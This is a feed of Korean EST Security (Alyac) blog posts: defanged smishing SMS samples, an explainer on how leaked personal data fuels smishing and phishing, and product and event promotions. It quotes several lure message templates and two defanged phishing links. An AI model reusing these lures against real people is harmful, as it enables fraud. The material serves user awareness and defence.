1	[Web발신][Coinone로그인알림]고객님계정이 해외에서 로그인감지되었습니다. hxxp://www.coino***.sbs
2	[Web발신]교통24 속도위반 [50.00]원부과. 납부: [hxxps://m.site.naver.com/1****L]에서 확인요망.

출처 : 알약M

기간 : 2025년 12월 6일 ~ 2025년 12월 12일

최근 빈번한 개인정보 유출 이슈, 모바일·PC 모두에서 필요한 진짜 보안 대비는?

알약5 — Tue, 9 Dec 2025 15:05:48 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

최근 국내 대형 이커머스 플랫폼을 포함한 여러 산업 분야에서 개인정보 유출 사고가 연달아 발생하며, 이용자 여러분의 걱정과 불안이 그 어느 때보다 커지고 있습니다. 이름·전화번호·주소 등 비교적 단순해 보이는 정보라도 공격자의 손에 들어가면 정교한 스미싱·피싱 공격으로 빠르게 전환되는 패턴이 반복적으로 관찰되고 있습니다.

특히 대규모 유출 사고가 발생하면, 그 직후부터 관련 스미싱 공격량이 급증하는 것이 주요 보안기관에서도 수차례 확인된 바 있는데요. 이러한 흐름 속에서 모바일과 PC를 모두 아우르는 보안 체계의 필요성은 점점 더 중요해지고 있습니다.

오늘은 최근 유출 이슈에서 확인되는 공격 패턴과 함께, 사용자가 일상에서 실질적으로 대비할 수 있는 보안 방법을 소개하고자 합니다.

1. 개인정보 유출이 ‘공격’으로 이어지는 이유

개인정보가 외부로 유출되면 공격자들은 다음과 같은 특징을 활용해 맞춤형 공격을 설계합니다.

☑︎ 이름, 연락처 기반 스미싱

"[이름]님, 주문이 취소되었습니다. 환불을 위해 확인이 필요합니다"

실제 이름과 최근 주문 정보를 언급하며 신뢰도를 높이는 수법입니다. 공격자는 유출된 정보를 바탕으로 수신자가 실제로 해당 서비스를 이용했을 가능성이 높다는 점을 활용합니다.

☑︎ 주소 기반 타깃 메시지

"[지역명] 배송센터입니다. 택배가 반송 예정이니 확인 부탁드립니다"

실제 거주 지역을 언급해 사용자의 경계심을 무너뜨립니다. 특히 아파트 단지나 주요 지역명을 포함하면 "진짜 택배 관련 문자"로 착각하기 쉽습니다.

☑︎ 이메일 기반 피싱 페이지 유도

"계정 보안 점검이 필요합니다. 즉시 본인 확인을 진행해주세요"

유출된 이메일 주소로 가짜 로그인 페이지 링크를 발송해, 아이디와 비밀번호를 직접 입력하도록 유도합니다. 이렇게 탈취된 계정은 금융 서비스나 업무 시스템 접근에 악용됩니다.

☑︎ 연락처 기반 2차 확산 공격

"어머니, 제 휴대폰이 고장 나서 새 번호로 연락드립니다. 급하게 돈이 필요해서..."

한 사람의 연락처를 탈취한 후, 저장된 가족·지인 정보를 활용해 연쇄적으로 공격을 확산시킵니다. 특히 부모님 세대는 자녀를 사칭한 메시지에 쉽게 속을 수 있습니다. 이런 공격은 '눈에 띄게 수상해 보이지 않는다'는 점이 가장 큰 특징이며, 스마트폰을 사용하는 부모님·고령층은 특히 취약합니다.

2. 공격이 모바일에서 PC로 확산되는 대표적 경로

많은 분들이 스미싱을 "모바일 문제"로만 인식하지만, 실제 금전 피해나 계정 탈취는 PC에서 일어나는 경우가 압도적으로 많습니다.

대표 시나리오

① 스마트폰으로 스미싱 문자 수신

'배송 확인', '환불 처리' 등의 문구

② 링크 클릭 → 악성앱 설치 또는 피싱 페이지 접속

연락처, SMS, 기기 정보 탈취

③ 탈취된 정보로 이메일·클라우드 계정 파악

비밀번호 재설정 링크 발송

④ 공격자가 PC 환경으로 접근 확대

업무 이메일, 클라우드 드라이브, 금융 서비스 접속

⑤ 랜섬웨어 감염 또는 직접적인 금전 피해 발생

파일 암호화, 계좌 이체, 정보 재판매

실제 사례

- 스마트폰에서 택배 관련 악성앱 설치

- 앱이 카카오톡·네이버 계정 정보 탈취

- 공격자가 PC에서 해당 계정으로 로그인

- 클라우드에 저장된 업무 문서·사진 접근

- 가족·동료에게 피싱 메시지 추가 발송

즉, 모바일–PC가 연결된 하나의 공격 흐름으로 이해해야 합니다.

3. 모바일 보안: AI 기반 스미싱 탐지와 ‘가족 단위 보호’

최근 스미싱은 단순 링크 중심 공격이 아닌, 메시지의 '의도·문맥'을 정확히 파악해야 하는 정교한 형태로 변화하고 있습니다.

왜 AI 기반 탐지가 필요한가?

전통적 방식의 한계

URL 블랙리스트만으로는 새로운 피싱 사이트 대응 불가
문자 내용이 정상적으로 보이지만 의도가 악의적인 경우 탐지 어려움
개인 맞춤형 공격(이름, 주소 포함)은 패턴 기반 탐지로 차단 불가

AI 기반 탐지의 장점

메시지의 맥락과 의도를 분석해 스미싱 여부 판단
새로운 유형의 공격도 실시간 학습으로 대응
개인 정보가 포함된 정교한 스미싱도 탐지 가능

가족 단위 보호가 중요한 이유

실제 스미싱 피해는 부모님·어르신 → 자녀·배우자 순으로 확산되는 사례가 흔합니다.

문제 상황

부모님이 스미싱 문자를 받고 링크 클릭
악성앱이 설치되지만 본인은 인지하지 못함
며칠 후 자녀의 계좌에서 이상 거래 발생
뒤늦게 부모님 휴대폰이 감염된 사실 확인

해결 방법: 가족 보호 기능

부모님 휴대폰에서 위험 메시지 탐지 시 자녀에게 실시간 알림
악성앱 설치 시도 즉시 차단 및 보호자 통지
가족 구성원 4명까지 하나의 대시보드에서 통합 관리

이런 구조를 고려할 때, 가족 구성원 휴대폰에서 발생한 위험을 내가 실시간으로 확인하고 조기에 대응할 수 있는 기능이 실질적 예방 효과를 높입니다.

알약 모바일 패밀리케어

알약 모바일 앱의 '패밀리케어'는 AI 기반 스미싱 분석과 가족 보호 기능을 강화한 모바일 보안 서비스로, 최근 증가하는 '맞춤형 스미싱 패턴' 대응에 효과적으로 설계되었습니다.

주요 기능

Google Cloud 기반 Vertex AI & Gemini 모델 활용
95% 이상 정확도의 스미싱 메시지 탐지
가족 4대까지 통합 보안 관리
부모님 휴대폰 위험 발생 시 자녀에게 실시간 알림

4. 알약 3.0으로 안전한 PC 환경 만들기

알약 3.0은 차세대 행위 기반 엔진을 적용해, 랜섬웨어와 신종 악성코드를 사전 차단하는 데 최적화된 PC 보안 환경을 제공합니다.

주요 특징

실시간 행위 분석 엔진으로 랜섬웨어 사전 차단
클라우드 기반 최신 위협 대응
USB 자동 검사 및 안전하지 않은 Wi-Fi 연결 차단
정밀 탐지 엔진으로 성능과 보안 동시 강화

모바일에서 탐지되지 못한 공격이 PC로 넘어오더라도 마지막 단계에서 방어할 수 있는 안정적인 보호막 역할을 수행합니다.

최근 연이은 개인정보 유출 사고로 인해 스미싱·피싱 공격이 더욱 정교해지고 있습니다. 하지만 올바른 보안 도구와 기본 수칙을 함께 실천하면 대부분의 위험을 사전에 차단할 수 있습니다.

이스트시큐리티는 알약 모바일 패밀리케어와 알약 3.0을 통해 사용자 여러분의 모바일·PC 전반을 아우르는 보안 환경을 강화하고 있으며, 앞으로도 변화하는 보안 위협에 대응하기 위한 기술적 고도화를 지속하겠습니다. 지금 바로 여러분과 가족의 디지털 안전을 점검해보세요.

알약 모바일 앱 설치 경품 이벤트! 100만원 행운의 주인공은?

알약5 — Mon, 8 Dec 2025 12:34:17 +0900

안녕하세요, 이스트시큐리티입니다.

알약 모바일 앱을 신규 설치해 주신 모든 분들을 위한 웰컴 이벤트가 진행중입니다. 앱 설치 후 응모 버튼만 클릭하면 누구나 간단히 참여할 수 있으며, 추첨을 통해 신세계 100만 원 상품권을 포함한 다양한 경품을 드립니다.

이번 이벤트는 알약을 처음 설치해 주신 고객 여러분께 감사의 마음을 전하고, 더 나은 보안 경험을 제공하기 위해 준비된 특별 프로모션입니다. 신세계백화점 상품권 100만 원권부터 스타벅스 아메리카노, 네이버페이 포인트, GS25 모바일상품권까지 다양한 경품이 준비되어있으니 꼭 참여해 보세요!

이벤트 정보

- 참여 기간 : 2025년 11월 25일(화) ~ 12월 12일(금) 23:59

- 당첨자 발표 : 2025년 12월 18일(목), 참여 시 입력한 연락처로 개별 안내

- 경품 발송 : 발표 후 영업일 기준 3~7일 내 순차 발송

참여 방법

1. 알약 앱 설치

2. 앱 실행 후 이벤트 페이지에서 이름·전화번호 입력

3. 클릭 한 번으로 즉시 응모 완료!

※ 이벤트 기간 중 1회만 참여 가능합니다

경품 구성

- 신세계백화점 상품권 100만 원권

- 스타벅스 아메리카노 T

- 네이버페이 포인트 3,000P

- GS25 모바일상품권 2,000원권

신세계 상품권 100만 원권 당첨 시 제세공과금 22%는 당첨자 부담입니다.
경품은 모두 무작위 추첨을 통해 공정하게 선정됩니다.

추가 혜택 안내

이벤트 참여를 완료하신 고객에게는 패밀리케어 연간 구독 30% 할인 혜택을 함께 제공합니다

연간 구독 상품에 한해 적용
이벤트 기간 내 결제한 건만 할인 가능
최초 결제 후 자동 갱신 시 동일 할인율 유지

※ 구독 해지 후 재구독 시 할인은 유지되지 않습니다

이벤트 참여 시 꼭 확인해주세요

1인 1회 참여 및 1회 당첨만 가능합니다. 중복 참여 및 중복 당첨은 불가합니다.
이벤트 참여 시점의 앱 설치 기록이 자동 반영되며, 반복 설치 등 비정상 참여는 제외됩니다.
패밀리케어 연간 구독자 또는 기존 초대 멤버는 이벤트 참여가 제한될 수 있습니다.
입력한 이름·전화번호 오류로 인한 경품 미수령은 책임지기 어렵습니다.
개인정보는 당첨자 선정 및 경품 발송 목적으로만 사용되며, 발송 완료 후 30일 이내 안전하게 파기됩니다.
네트워크 장애, 단말기 설정 문제 등 사용자 환경으로 인한 참여 오류는 책임지지 않습니다.
이벤트 내용과 일정은 필요 시 사전 안내 없이 변경될 수 있습니다.

알약 모바일 앱을 설치해 주셔서 진심으로 감사드리며, 앞으로도 더 안전한 디지털 생활을 위한 보안 서비스를 제공하기 위해 최선을 다하겠습니다. 많은 관심과 참여 부탁드립니다.

1인 사업자, 프리랜서도 걱정 끝! 알약 3.0으로 PC 보안 스트레스 없이 일하는 법

알약5 — Mon, 8 Dec 2025 10:28:32 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

1인 사업자와 프리랜서에게 하루는 늘 부족합니다. 클라이언트 미팅, 제안서 작성, 세무 처리까지 모든 업무를 혼자 해결하다 보면 PC 보안은 자연스럽게 뒷순위로 밀리게 되는데요. 하지만 실제 보안 위협은 규모를 가리지 않습니다. 보안 체계가 약한 소규모 사업자가 사이버 공격의 주요 타깃이 되는 추세는 더욱 뚜렷해지고 있습니다.

AI 활용

AI 활용 시대, 1인 사업자의 보안 리스크는 더 커지고 있습니다

소규모 사업 환경에서는 보안 점검이 늘 ‘나중에’로 밀리기 쉽습니다. 하지만 사이버 공격은 기다려주지 않습니다. 2024년 한국인터넷진흥원(KISA)에 따르면 전체 악성코드 감염 중 85% 이상이 랜섬웨어이며, 피해 기업의 94%가 중소사업자·중견기업으로 나타났습니다. 규모가 작을수록 보안 체계가 취약해 공격자들에게 더 매력적인 표적이 되고 있는 것입니다.

고객 데이터베이스, 프로젝트 산출물, 재무 자료 등이 랜섬웨어로 암호화되면 사업은 즉시 멈춥니다. 복구 비용을 지불해도 모든 파일이 복원된다는 보장은 없고, 고객 신뢰를 잃을 가능성도 높습니다. 보안의 중요성은 충분히 알고 있지만 전문 인력도, 별도의 IT 예산도 갖추기 어려운 것이 현실입니다. 그렇다면 1인 사업자, 소규모 사업 환경에는 어떤 보안 시스템이 필요할까요?

비즈니스에만 집중하세요.
보안 관리는 알약이 책임집니다.

알약 3.0 - 더 강해진 탐지력, 더 편리해진 사용성

복잡한 설정이나 보안 지식 없이도 자동으로 PC 보호가 가능하도록 알약 3.0은 완전히 새롭게 설계되었습니다. 설치 후 단 한 번의 설정만으로 실시간 감시, 예약 검사, USB 자동 검사까지 모두 자동으로 운영됩니다.

듀얼 엔진 기반의 기업 수준 탐지력

1,200만 명이 선택한 국민 백신 알약 3.0은 자체 엔진 테라(Tera)와 글로벌 보안 엔진 비트디펜더(Bitdefender) 두 엔진을 결합한 듀얼 엔진 구조로 국내외 악성코드를 높은 정확도로 탐지합니다. 신종 악성코드와 랜섬웨어까지 행위 기반 탐지 기술로 사전 차단해 전문 지식 없이도 기업 수준의 보안 환경을 유지할 수 있습니다.

또한 알약 3.0은 PC에서 이루어지는 활동을 실시간 모니터링하며 악성 행위를 감지하는 즉시 차단합니다.

다운로드 시도 → 자동 검사 및 차단
의심 프로세스 실행 → 행위 기반 탐지
랜섬웨어 암호화 패턴 감지 → 사전 차단

특히 랜섬웨어는 파일 암호화 이전에 특정한 행동 패턴을 보이는데, 알약 3.0은 이를 먼저 탐지해 암호화가 시작되기 전에 프로세스를 차단합니다.

사용자는 별도의 조치를 취하지 않아도 됩니다. 업무에 집중하는 동안 알약이 알아서 모든 위협을 차단합니다.

한 번 설정하면 끝! 모든 점검·차단 작업의 자동화

예약 검사 시간만 맞춰두면 정기 점검이 자동으로 실행됩니다. 파일 다운로드, 프로그램 설치, USB 연결 등 주요 활동 시에도 자동으로 검사가 이루어지기 때문에 매번 직접 버튼을 눌러야 하는 번거로움이 없습니다.

보안 전문가들은 최소 주 1회 정기 검사를 권장하지만 매번 기억하기란 쉽지 않죠. 하지만 알약 3.0의 예약 검사 기능은 이 문제를 완벽히 해결다. 설정해둔 시간에 맞춰 자동으로 정밀 검사가 이뤄지며, 위협 발견 시 자동 치료 또는 알림이 제공됩니다.

가볍고 빠른 성능으로 업무 방해 없이!

알약 3.0은 백그라운드 최적화를 통해 디자인, 영상 편집, 고용량 파일 작업 등 무거운 작업 환경에서도 느려짐 없이 안정적으로 작동합니다.

USB 자동 검사로 외부 감염 차단

거래처 USB, 고객 외장하드 등 외부 저장장치는 악성코드 감염률이 높은 경로입니다. 알약 3.0은 USB·외장하드를 연결하는 즉시 자동 검사를 실행해 눈에 보이지 않는 감염 경로까지 선제적으로 차단합니다.

이런 분들께 특히 추천합니다!

외부 파일을 자주 받는 프리랜서
고객사 PC에서 작업 후 파일을 가져오는 1인 사업자
공용 PC·인쇄소 이용이 많은 디자이너

한눈에 보기 쉬운 보안 상태

새로운 알약 3.0은 UI와 UX를 더 직관적으로 개편해 누구나 쉽게 현재 보안 상태를 확인하고 필요한 기능을 바로 사용할 수 있도록 구성했습니다.

하고 싶은 일에 집중하세요. 보안은 알약이 지켜드립니다.

1인 사업자에게 시간은 곧 생산성입니다. 클릭 한 번으로 자동화된 PC 보안 환경을 만들고, 중요한 업무에만 집중해 보세요. 알약 3.0 한 번의 설치로 모든 보안 관리가 자동화됩니다. 1,200만 명이 선택한 국민 백신, 지금 바로 무료 다운로드하고 강화된 탐지력과 간편한 사용성을 경험해보세요.